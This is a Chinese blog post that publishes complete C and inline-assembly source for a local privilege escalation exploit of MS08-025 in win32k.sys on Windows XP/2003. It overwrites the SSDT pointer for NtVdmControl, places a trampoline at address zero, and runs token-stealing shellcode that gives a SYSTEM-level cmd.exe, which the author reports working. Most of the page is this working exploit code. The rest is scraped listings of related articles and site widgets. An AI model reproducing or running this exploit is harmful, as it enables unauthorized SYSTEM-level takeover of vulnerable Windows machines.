MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit2

最新推荐文章于 2024-06-19 11:43:49 发布
原创 最新推荐文章于 2024-06-19 11:43:49 发布 · 876 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#system #null #token #callback #cmd #search

本文介绍了一种针对Windows XP SP2系统的MS08-025漏洞利用方法,通过覆盖SSDT表中的NtVdmControl地址来实现权限提升。文中详细展示了如何使用C语言编写shellcode并进行内存分配,最终达到从普通用户权限升级到SYSTEM权限的目的。 
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit

另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行



#include <stdio.h>

#include <windows.h>



typedef LONG NTSTATUS;

typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE               ProcessHandle,

                                       PVOID            *BaseAddress,

                                       ULONG                ZeroBits,

                                       PULONG           RegionSize,

                                       ULONG                AllocationType,

                                       ULONG                Protect );

typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);

void ErrorQuit(char *msg)

{

    printf("%s:%x/n", msg, GetLastError());

    ExitProcess(0);

}

ZWVDMCONTROL    ZwVdmControl=NULL;

OSVERSIONINFOEX OsVersionInfo;



_declspec(naked) int ShellCode()

{



      if ( OsVersionInfo.dwMinorVersion == 1 ) {



       __asm {



               nop

               nop

               nop

               nop

               nop

               nop



               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)

               Mov eax,[eax]



               mov esi,[eax+0x220]

               mov eax,esi



searchXp:



               mov eax,[eax+0x88]

               sub eax,0x88

               mov edx,[eax+0x84]

               cmp edx,0x4 // Find System Process

               jne searchXp



               mov eax,[eax+0xc8] // 获取system进程的token

               mov [esi+0xc8],eax // 修改当前进程的token



               ret 8



       }

   }

   if ( OsVersionInfo.dwMinorVersion == 2 ) {



       __asm {



           nop

               nop

               nop

               nop

               nop

               nop



               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)

               Mov eax,[eax]



               mov esi,[eax+0x220]

               mov eax,esi



search2003:



               mov eax,[eax+0x98]

               sub eax,0x98

               mov edx,[eax+0x94]

                cmp edx,0x4 // Find System Process

               jne search2003



               mov eax,[eax+0xd8] // 获取system进程的token

               mov [esi+0xd8],eax // 修改当前进程的token

               ret 8



       }

   }





}



void InitTrampoline()

{



   PNTALLOCATE NtAllocateVirtualMemory;

   LPVOID       addr = (LPVOID)3;

   DWORD       dwShellSize=0x1000;

   unsigned char trampoline[]="/x68/x00/x00/x00/x00" //push 0x0

                               "/xc3";               // retn



   NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");



   if( !NtAllocateVirtualMemory )

       exit(0);



   NtAllocateVirtualMemory(   (HANDLE)-1,

                               &addr,

                               0,

                               &dwShellSize,

                               MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,

                               PAGE_EXECUTE_READWRITE );



   if( (PULONG)addr )

   {

       printf("/n[++] Error Allocating memory/n");

       exit(0);

   }





   *(PULONG*)(trampoline+1)=(PULONG)ShellCode;

   memcpy(NULL,trampoline,sizeof(trampoline)-1);

}

int Callback_Overview()

{

   printf("/n");

   printf("=====================================================================   /n");

   printf("/t/tMicrosoft Windows XP SP2 - MS08-025 -       /n");

   printf("/twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit   /n");

   printf("=====================================================================   /n");

   printf("+ References:/n");

   printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx/n");

   printf(" http://hi.baidu.com/vessial/n/n");

   return 1;

}



void GetFunction()

{

    HANDLE    hNtdll,hNtos;

   

    hNtdll = LoadLibrary("ntdll.dll");

    if(hNtdll == NULL)

        ErrorQuit("LoadLibrary failed./n");

       

    ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");

    if(ZwVdmControl == NULL)

        ErrorQuit("GetProcAddress failed./n");

              

    FreeLibrary(hNtdll);

}

int main(int argc, char **argv)

{



   //PULONG   PntVdmControl=0x805F0DB0;

PULONG   PntVdmControl=0x80502460; //通过*(PULONG)(KeServiceDescriptorTalbe)+0x10c*4获得

   

    

   STARTUPINFOA                stStartup;

   PROCESS_INFORMATION            pi;





   Callback_Overview();

   GetFunction();

   RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );

   OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);

   GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);



   if ( OsVersionInfo.dwMajorVersion != 5 ) {



       printf( "Not NT5 system/n" );

       ExitProcess( 0 );

   }

   //Get Operatiny System Version

       

   InitTrampoline();



   SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );

   SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);//覆盖NtVdmControl所在的SSDT表,覆盖后结果为0x0

   printf("/n[+] Executing Shellcode.../n");



   ZwVdmControl(0, NULL);//这里就是call 0x0了,跳转执行我们的shellcode,哈哈:)

   GetStartupInfo( &stStartup );



   CreateProcess( NULL,

       "cmd.exe",

       NULL,

       NULL,

       TRUE,

       NULL,

       NULL,

       NULL,

       &stStartup,

       &pi );   //此时创建的cmd.exe是SYSTEM权限



  

   printf("[+] Exiting.../n");



   return TRUE;

}

我在XP测试成功,下面的第一个cmd是SYSTEM权限,这是我们提权后的,一个cmd是test权限
iiprogram
关注
HTB academy --- Windows Privilege Escalation --- Dealing with End of Life Systems
g9999g的博客
02-23 1056
昨天返校没发文章,而且被靶机的破环境折磨死了,原先可以用的连接方式都不好用,只能用那条命令连接,而且还只能在ps界面执行,要不然就会一直报错,本来没啥难度被这恶心了好久,还有从今天开始进行更新,明天就该结束window提权模块,下一个模块是域控方面的还望大家多多支持。
红队专题-与维持隐匿Privilege Escalation
aming小老弟
10-27 2036
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
weixin_33889665的博客
04-18 95
以下消息来自幻影论坛[Ph4nt0m]邮件组 [url]http://hi.baidu.com/vessial/blog/item/4ae4291b46f8e91c8718bfc2.html[/url] 欢迎转载,但希望大家注明出处和保留其完整性,谢谢:)MS08-025 win32k.sys NtUserFnOUTSTRING Privileg...
普通恶意代码技术分析与检测
weixin_30279315的博客
03-12 419
创建时间:2008-03-07文章属性:原创文章提交:fleshwound (fleshwound_at_126.com)fleshwound(fleshwound@smatrix.org)http://www.smatrix.org1 引言  近些年来,恶意代码依赖一些特殊的Native API函数和内核系统函数进行感染、传播、隐藏的这种趋势愈加明显代码,并大量的使用了多重加密壳、驱动关联壳、变...
无驱动执行Ring0代码
wowbell的专栏
02-23 1116
<br />// 原理:通过/Device/PhysicalMemory修改NtVdmControl入口,跳转到Ring0Code<br /> //************************************************************************<br /> #include<br /> #include<br /> #include<br /><br /> #pragma comment (lib,"ntdll.lib") // Copy From
在NT系列操作系统里让自己“消失”
竹君子之家
09-10 1800
创建时间:2004-03-06文章属性:原创文章提交:SoBeIt (kinsephi_at_hotmail.com)===================[ 在NT系列操作系统里让自己“消失”]==================                                               SoBeIt            作者:Holy_Father     
51-52Windows密码安全性测试与Windows提权
XLbb的博客
06-19 1560
2、kali的【ophcrack】工具彩虹表hash暴力破解。
Hackthebox:Optimum Walkthrough(not use metasploit)
汗的博客
12-06 643
信息收集 nmap 10.10.10.8 发现只开了一个80端口的http 浏览器打开 google可知HFS的含义是Http File Server,可以上传文件,页面也显示HttpFileServer 2.3 查找相关漏洞 searchsploit HFS -----------------------------------------------------------------------------------------------------------------------------
王宇:NtVDM子系统拾趣
05-29
9月25日,SyScan360 2013国际前瞻信息安全会议在北京国家会议中心举行。360安全研究工程师王宇发表题为《NtVdm子系统拾趣》的演讲,针对Windows组件NtVdm子系统的安全性进行深入分析。
kali安装xlrd指定版本
qq_43691308的博客
01-28 1322
kali中安装xlrd库 1、sudo apt-get install python-setuptools 2、 python -m easy_install xlrd 最近由于xlrd更新了版本,导致windows-exploit-suggester.py使用时报错 oot@kali:~/Desktop/suggester# python windows-exploit-suggester.py --database ms.xlsx --systeminfo test.txt [*] initiati
NtDLL的API
伤了
04-14 886
转帖From:郁金香的csdn博客http://blog.csdn.net/kkksi13996362600/archive/2009/03/05/3959312.aspx   1. 内容 2. 介绍 3. 文件 3.1 NtQueryDirectoryFile 3.2 NtVdmControl 4. 进程 5. 注册表 5.1 NtEnumerateKey 5.2 NtEnu...
117页-图解重要数据处理安全要求(1).pdf
11-26
117页-图解重要数据处理安全要求(1)
基于C++与ROS的双机械臂协同控制系统:Gazebo仿真与UR10实体机器人集成开发实践
最新发布
11-26
本项目采用C++编程语言结合ROS框架构建了完整的双机械臂控制系统,实现了Gazebo仿真环境下的协同运动模拟,并完成了两台实体UR10工业机器人的联动控制。该毕业设计在答辩环节获得98分的优异成绩,所有程序代码均通过系统性调试验证,保证可直接部署运行。 系统架构包含三个核心模块:基于ROS通信架构的双臂协调控制器、Gazebo物理引擎下的动力学仿真环境、以及真实UR10机器人的硬件接口层。在仿真验证阶段,开发了双臂碰撞检测算法和轨迹规划模块,通过ROS控制包实现了末端执行器的同步轨迹跟踪。硬件集成方面,建立了基于TCP/IP协议的实时通信链路,解决了双机数据同步和运动指令分发等关键技术问题。 本资源适用于自动化、机械电子、人工智能等专业方向的课程实践,可作为高年级课程设计、毕业课题的重要参考案例。系统采用模块化设计理念,控制核心与硬件接口分离架构便于功能扩展,具备工程实践能力的学习者可在现有框架基础上进行二次开发,例如集成视觉感知模块或优化运动规划算法。 项目文档详细记录了环境配置流程、参数调试方法和实验验证数据,特别说明了双机协同作业时的时序同步解决方案。所有功能模块均提供完整的API接口说明,便于使用者快速理解系统架构并进行定制化修改。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
掌握系统变化的艺术
11-26
本书聚焦于现代软件系统中变化的常态性,提出以模型驱动和知识管理为核心的应对框架。通过元建模、可变性设计与协同追踪技术,支持系统全生命周期的持续演化。内容涵盖从需求到运维的多层级变革管理,强调跨领域协作与形式化方法的融合,为构建高适应性系统提供理论与实践指南。
基于混合规划求解机组组合(yalmip+Cplex实现)
11-26
基于混合规划求解机组组合(yalmip+Cplex实现)
Comfyui文本转语音工作流以及素材和插件资源
11-26
Comfyui文本转语音工作流以及素材和插件资源 适用人群:自媒体创作者、视频剪辑师、内容运营者(需高效生成配音素材);开发工程师、产品经理;教育 / 办公场景从业者;对 AI 音视频创作感兴趣的用户。 使用场景及目标 核心场景:短视频平台运营; 其他说明 提供可直接套用的 工作流 文件,无需复杂编程基础;
BYD BF7612CM系列MCU资源包(整理版)
11-26
本资源包是为使用BYD BF7612CM系列MCU的开发者整理的资料集合。由于初次接触该系列MCU时遇到了不少问题,因此将搜集到的优质资源进行了整理和上传,希望能为大家提供帮助,减少开发过程中的困扰。 资源内容 本资源包主要包含以下内容: 官方固件库:提供BYD官方发布的BF7612CM系列MCU的固件库,方便开发者进行底层驱动开发。 Keil编译与仿真工具:包含在Keil开发环境中编译和仿真BF7612CM系列MCU所需的芯片包和JTAG驱动,确保开发环境的顺利搭建。 官方MCU产品应用注意事项:提供BYD官方发布的MCU产品应用注意事项,帮助开发者避免常见问题,提高开发效率。 第三方例程:搜集了一些第三方开发者分享的BF7612CM系列MCU的例程,涵盖了多种应用场景,供开发者参考和学习。 触摸按键应用标准:提供BYD官方发布的触摸按键应用标准,帮助开发者快速上手触摸按键的开发。
libncurses.so.5(NCURSES_5.0.19991023)(64bit) 被 smutool-1.1.1-1.nfs.x86_64需求
03-25
好的,我现在需要解决用户提到的关于smutool-1.1.1-1.nfs.x86_64对libncurses.so.5(NCURSES_5.0.19991023)(64bit)的...: 参考 Linux 权限提升基础 https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值